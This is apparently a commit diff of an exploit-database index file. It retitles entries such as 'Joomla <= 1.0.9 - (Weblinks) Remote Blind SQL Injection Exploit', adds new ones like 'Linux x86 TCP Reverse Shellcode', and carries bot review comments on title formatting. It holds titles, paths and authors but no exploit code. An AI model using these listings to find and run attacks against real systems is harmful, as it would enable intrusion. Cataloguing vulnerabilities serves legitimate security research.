DB: 2016-07-09

9 new exploits

Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit
Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit

Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)
Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)

Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability
Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability

VLC AMV Dangling Pointer Vulnerability
VLC - AMV Dangling Pointer Vulnerability

Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution
Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution

Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability
Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability

HP Client Automation Command Injection
HP Client - Automation Command Injection

Persistent Systems Client Automation Command Injection RCE
Persistent Systems Client Automation - Command Injection RCE

ElasticSearch Unauthenticated Remote Code Execution
ElasticSearch - Unauthenticated Remote Code Execution

ElasticSearch Search Groovy Sandbox Bypass
ElasticSearch - Search Groovy Sandbox Bypass

Fedora abrt Race Condition Exploit
Fedora - abrt Race Condition Exploit

ProFTPD 1.3.5 Mod_Copy Command Execution
ProFTPD 1.3.5 - Mod_Copy Command Execution

Windows ClientCopyImage Win32k Exploit
Microsoft Windows - ClientCopyImage Win32k Exploit

Wolf CMS Arbitrary File Upload To Command Execution
Wolf CMS - Arbitrary File Upload To Command Execution

Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)
Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)

Kaseya VSA uploader.aspx Arbitrary File Upload
Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload

Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash
Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash

Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)

Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)
Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)

NETGEAR ProSafe Network Management System 300 Arbitrary File Upload
NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload

Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)
Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)

OS X / iOS Suid Binary Logic Error Kernel Code Execution
OS X / iOS - Suid Binary Logic Error Kernel Code Execution

Novell ServiceDesk Authenticated File Upload
Novell ServiceDesk - Authenticated File Upload

Mach Race OS X Local Privilege Escalation Exploit
Mach Race OS X - Local Privilege Escalation Exploit

Oracle ATS Arbitrary File Upload
Oracle Application Testing Suite (ATS) - Arbitrary File Upload

Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)

WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF
Hide.Me VPN Client 1.2.4 - Privilege Escalation
InstantHMI 6.1 - Privilege Escalation
Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC
Microsoft WinDbg logviewer.exe - Crash PoC
Linux x86 TCP Reverse Shellcode - 75 bytes
php Real Estate Script 3 - Arbitrary File Disclosure
CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval
Streamo Online Radio And TV Streaming CMS - SQL Injection
parent c7daadde64
commit 29f0764fac
10 changed files with 925 additions and 27 deletions
63
files.csv
@ -1630,7 +1630,7 @@ id,file,description,date,author,platform,type,port
1919,platforms/php/webapps/1919.txt,"CMS Faethon <= 1.3.2 (mainpath) Remote File Inclusion Vulnerability",2006-06-16,K-159,php,webapps,0
1920,platforms/php/webapps/1920.php,"Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
1921,platforms/php/webapps/1921.pl,"FlashBB <= 1.1.8 (phpbb_root_path) Remote File Include Exploit",2006-06-17,h4ntu,php,webapps,0
1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability",2006-06-17,Basti,php,webapps,0
1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure",2006-06-18,php0t,multiple,local,0
1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0
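Review bot: the new title for 1922 puts the " - " separator between the version and the "(Weblinks)" qualifier, while the Mambo entry 1920 three lines above keeps the qualifier attached to the product ("Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit"). Keeping the parenthetical with the product, as in "Joomla <= 1.0.9 (Weblinks) - Remote Blind SQL Injection Exploit", would follow the "product - description" convention the rest of this commit applies.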
@ -12872,7 +12872,7 @@ id,file,description,date,author,platform,type,port
14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta - Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0
14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0
14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0
14706,platforms/windows/local/14706.py,"Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0
14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0
14712,platforms/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0
@ -13858,7 +13858,7 @@ id,file,description,date,author,platform,type,port
15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0
15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0
16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
16001,platforms/php/webapps/16001.txt,"People Joomla Component 1.0.0 - Local File Inclusion Vulnerability",2011-01-16,"ALTBTA ",php,webapps,0
16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0
@ -14833,7 +14833,7 @@ id,file,description,date,author,platform,type,port
17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69
17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0
17048,platforms/windows/remote/17048.rb,"VLC AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0
17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0
17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0
@ -21506,7 +21506,7 @@ id,file,description,date,author,platform,type,port
24318,platforms/windows/shellcode/24318.c,"Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0
24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0
24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0
24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0
24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0
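Review bot: the renamed 24321 line carries over "4.2x_ 4.3x", where the underscore looks like an escaping artefact rather than part of the version string. The description field is already double-quoted, so a comma or a slash can be written directly; "Movable Type 4.2x/4.3x - Web Upgrade Remote Code Execution" would match the "Microsoft Windows 8.1/10" style used elsewhere in this commit and is worth fixing while the line is being touched.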
@ -26934,7 +26934,7 @@ id,file,description,date,author,platform,type,port
29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0
29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0
29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal Vulnerability",2007-04-11,Dr.RoVeR,php,webapps,0
29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass Vulnerability",2007-04-11,"Jon Oberheide",cgi,webapps,0
29843,platforms/windows/remote/29843.txt,"webMethods Glue <= 6.5.1 Console Directory Traversal Vulnerability",2007-04-11,"Patrick Webster",windows,remote,0
@ -32579,7 +32579,7 @@ id,file,description,date,author,platform,type,port
36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0
36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0
36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80
36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
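Review bot: the new title for 36169 splits the product name: "HP Client - Automation Command Injection" reads as a product called "HP Client". The product is HP Client Automation, and the companion entry 36206 in the next hunk is titled "Persistent Systems Client Automation - Command Injection RCE", with the dash after the full product name; "HP Client Automation - Command Injection" would be consistent with it and with the port (3465) both entries share.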
@ -32631,7 +32631,7 @@ id,file,description,date,author,platform,type,port
36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
@ -32756,7 +32756,7 @@ id,file,description,date,author,platform,type,port
36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0
36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0
36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0
36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
@ -32829,7 +32829,7 @@ id,file,description,date,author,platform,type,port
36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0
36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0
36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0
36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0
36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0
@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port
36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0
36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0
36747,platforms/linux/local/36747.c,"Fedora abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
@ -33640,7 +33640,7 @@ id,file,description,date,author,platform,type,port
37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port
37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot (28 Bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
@ -34307,7 +34307,7 @@ id,file,description,date,author,platform,type,port
37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
@ -34557,7 +34557,7 @@ id,file,description,date,author,platform,type,port
38272,platforms/windows/dos/38272.txt,"Windows Kernel - Brush Object Use-After-Free Vulnerability (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0
38273,platforms/win32/dos/38273.txt,"Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38274,platforms/win32/dos/38274.txt,"Windows Kernel - NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win32,dos,0
38276,platforms/win32/dos/38276.txt,"Windows Kernel - FlashWindowEx Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
38277,platforms/win32/dos/38277.txt,"Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
38278,platforms/win32/dos/38278.txt,"Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
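Review bot: 38275 is changed only by appending "(1)" to its title; no "(2)" counterpart appears in this diff, and the path (38275.txt), author and date are unchanged. A disambiguating index only helps if a second "Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)" entry exists. If it does, name its id in the commit message so the pair can be checked; if it does not, the suffix is noise and should be dropped.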
@ -34642,7 +34642,7 @@ id,file,description,date,author,platform,type,port
38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0
38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0
38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0
38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0
@ -34879,7 +34879,7 @@ id,file,description,date,author,platform,type,port
38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
38612,platforms/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",android,dos,0
38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
38614,platforms/android/dos/38614.txt,"Samsung libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0
38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use After Free",2015-11-03,"John Leitch",multiple,dos,0
@ -35544,8 +35544,8 @@ id,file,description,date,author,platform,type,port
39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
39308,platforms/linux/dos/39308.c,"Linux Kernel <= 3.x / <= 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0
39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin <=1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80
39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39312,platforms/lin_x86-64/shellcode/39312.c,"x86_64 Linux xor/not/div Encoded execve Shellcode",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
39313,platforms/php/webapps/39313.txt,"Food Order Portal 'admin_user_delete.php' Cross Site Request Forgery Vulnerability",2014-09-12,KnocKout,php,webapps,0
39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
@ -35660,7 +35660,7 @@ id,file,description,date,author,platform,type,port
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)",2016-02-10,koczkatamas,windows,local,0
39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure Vulnerability",2016-02-10,Vulnerability-Lab,multiple,webapps,0
39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80
